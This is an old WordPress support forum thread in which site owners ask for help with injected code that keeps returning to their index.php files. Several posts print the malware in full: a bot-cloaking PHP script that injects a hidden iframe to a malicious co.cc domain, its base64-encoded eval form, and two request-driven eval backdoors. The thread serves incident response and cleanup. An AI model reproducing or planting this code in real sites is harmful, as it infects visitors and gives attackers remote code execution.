WordPress.org

Ready to get started?Download WordPress

Forums

Malicious code in index.php keeps coming back (13 posts)

  1. nerdalertmarketing
    Member
    Posted 3 years ago #

    dont know if this is the right section but i really need some help:

    a couple of days back a site of mine was hacked (dont know how) and my index file was modified with some code that modifies the header. i dont know exactly what it does because my AVG blocked the attack locally. I ran a virus scan in cpanel and removed the code. Virus scan came up clean. i reset my cpanel password, FTP password adn wordpress password. i also installed secure wordpress plugin (wish i would have done that initially)and everything seemed ok.... but after a day i went and checked the site again and the code was back. it was right back in the index file again. This time i copied it and it decodes to this:

    error_reporting(0);
    $bot = FALSE ;
    $user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
    $stop_ips_masks = array(
    	array("216.239.32.0","216.239.63.255"),
    	array("64.68.80.0"  ,"64.68.87.255"  ),
    	array("66.102.0.0",  "66.102.15.255"),
    	array("64.233.160.0","64.233.191.255"),
    	array("66.249.64.0", "66.249.95.255"),
    	array("72.14.192.0", "72.14.255.255"),
    	array("209.85.128.0","209.85.255.255"),
    	array("198.108.100.192","198.108.100.207"),
    	array("173.194.0.0","173.194.255.255"),
    	array("216.33.229.144","216.33.229.151"),
    	array("216.33.229.160","216.33.229.167"),
    	array("209.185.108.128","209.185.108.255"),
    	array("216.109.75.80","216.109.75.95"),
    	array("64.68.88.0","64.68.95.255"),
    	array("64.68.64.64","64.68.64.127"),
    	array("64.41.221.192","64.41.221.207"),
    	array("74.125.0.0","74.125.255.255"),
    	array("65.52.0.0","65.55.255.255"),
    	array("74.6.0.0","74.6.255.255"),
    	array("67.195.0.0","67.195.255.255"),
    	array("72.30.0.0","72.30.255.255"),
    	array("38.0.0.0","38.255.255.255")
    	);
    $my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
    foreach ( $stop_ips_masks as $IPs ) {
    	$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    	if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
    }
    foreach ($user_agent_to_filter as $bot_sign){
    	if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
    }
    if (!$bot) {
    echo '<iframe src="http://gb3hnh3nf.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>';
    }

    I have asked my host to help but they cant do much other than suggest a reinstall. but i dont want to loose all my data.

    what can i do here? there is obviously some additional code corrupting my wp install but i dont know where to look or how to remove it.

    anyone ever encounter something like this? can anyone help me out?

  2. Samuel B
    moderator
    Posted 3 years ago #

  3. creatorul
    Member
    Posted 3 years ago #

    I have the same problem and I haven't found an answer. Did you manage to remove it ? Mine is returning and infects all the sites on my shared hosting.

    eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9nMmhzamdqZ2ZqLmNvLmNjL1FRa0ZCZzBNQkFFREFBQUJFa2NKQlFZTkRBMEREUUFCQmc9PSIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC9pZnJhbWU+JzsNCn0='));

    This is inserted in every index.php file and for the index.html it only inserts the iframe with link to co.cc site after the <body> tag.
    My conclusions so far:

    1. It is not the hosting - checked other sites from other hosting accounts on the same server and they are fine. Only all my sites from my account have the virus
    2. Scanned my computers several times can't be from there. I've changed all passwords: ftp, cpanel, wordpress and even upgraded wordpress to latest version and it still gets infected
    3. Can't be via ftp .. I've checked ftp logs and everything is clean only what I modified manually. Also I have other ftp accounts saved into TotalCommander and they are untouched.

    Before infection:
    -rw-r--r-- 1 creato creato 398 Mar 1 05:29 index.php
    After:
    -rw-r--r-- 1 creato creato 3083 Mar 1 05:29 index.php

    As you can see the date of modification doesn't change.
    It must be a wordpress hack which gives it access to my whole shared hosting account thus infecting all other sites (wordpress or not). I only have wordpress installed and some static sites so there must be a backdoor I can't find.

    Thanks

  4. nerdalertmarketing
    Member
    Posted 3 years ago #

    i fixed it by moving the add-ons to their own c-panel and re-installing everything.....but i don't think i needed to go that far. after i moved i found that the hack was done with the permalink structure somehow....when i moved to a new cpanel account, all my links were broken and going to a 404 page....which was due to the framing sending it elsewhere. anyway, i just changed the permakink structure to standard, and then back to the custom setup i had and that fixed everything. so try just changing and re-saving the permalinks before you do any sort of re-install or migration or anything. let ne know if that works

    mine is clean finally.

  5. creatorul
    Member
    Posted 3 years ago #

    The sad thing is that I don't have any backup so I must work on removing their backdoor somehow but I can't seem to find it.
    I have few sites with wordpress, one with articlems and some plain sites.
    Do you have other cms besides wordpress ? Which version of wordpress? Trying to narrow the hackable one.

    Thx

  6. creatorul
    Member
    Posted 3 years ago #

    Help :(

  7. tanira
    Member
    Posted 3 years ago #

    it can be your .htaccess file or the CHMOD permissions of your folders. this topic can help: http://wordpress.org/support/topic/file-permission-chmod-help-htaccess-and-wp-content?replies=7

    and my .htaccess file is fine with:

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    
    # END WordPress
  8. nerdalertmarketing
    Member
    Posted 3 years ago #

    im afraid i have nothing more to add. moving the site from one cpanel account to another (basically re-installing) it worked for me. i dont knwo enough about it to be able to offer more advice. best of luck....i feel your pain.

  9. creatorul
    Member
    Posted 3 years ago #

    Thank you everyone for the tips.
    You can find the answer in this article:
    http://blog.unmaskparasites.com/2011/03/02/versatile-cc-attacks/
    That's a very good article and the author is covering all possible backdoor locations.

    Have a good day, virus-free

  10. studiochris
    Member
    Posted 3 years ago #

    I just cleaned up one of these for a client, and I think I got it all...

    Check your database for a user called "WordPress.Org". It won't show up in wp-admin because it was placed by an SQL injection or something and the first name is set to a bit of JavaScript that executes and removes all traces of the user on the Users page. Be sure to clean both wp_users and wp_usermeta in the database.

    Next, check Appearance > Custom Header and delete the currently set header(s). In the account I cleaned up, the main backdoor was the uploaded header, presumably set by the fake admin. It was a duplicate of the site's real header image and set by CSS, so it was essentially invisible.

    Go through all of the main index.php files in your hosting account... domains, subdomains, other software packages -- it doesn't matter -- and delete the base64 encoded PHP at the top of the file. If you don't delete the script-filled image first, if anyone visits the site and downloads the image, the base64 bit will be injected into index.php again and the iframe will come back.

    Good luck.

  11. Daniel Cid
    Member
    Posted 3 years ago #

    This is the malware you have:
    http://blog.sucuri.net/2011/02/the-attack-from-the-ccs-domains-considered-harmful.html

    And it also comes together with a backdoor hidden in your themes. So search on all your themes files for:

    if (isset($_REQUEST[\'asc\'])) eval(stripslashes($_REQUEST[\'asc\']));

    *thats the backdoor associated with this malware.

  12. Dil
    Member
    Posted 2 years ago #

    hey .. I do have the same problem. Dont have access to the c-panel is there any other way to do it ..

    The code that is appearing on the top

    if (isset($_REQUEST['FILE'])){$_FILE = $_REQUEST['5db4c956bb56f6f050412fecd239344f']('$_',$_REQUEST['FILE'].'($_);'); $_FILE(stripslashes($_REQUEST['HOST']));}

    Please view the site here - http://www.iphindia.org

  13. Dil
    Member
    Posted 2 years ago #

    Had to reinstall the wordpress

Topic Closed

This topic has been closed to new replies.

About this Topic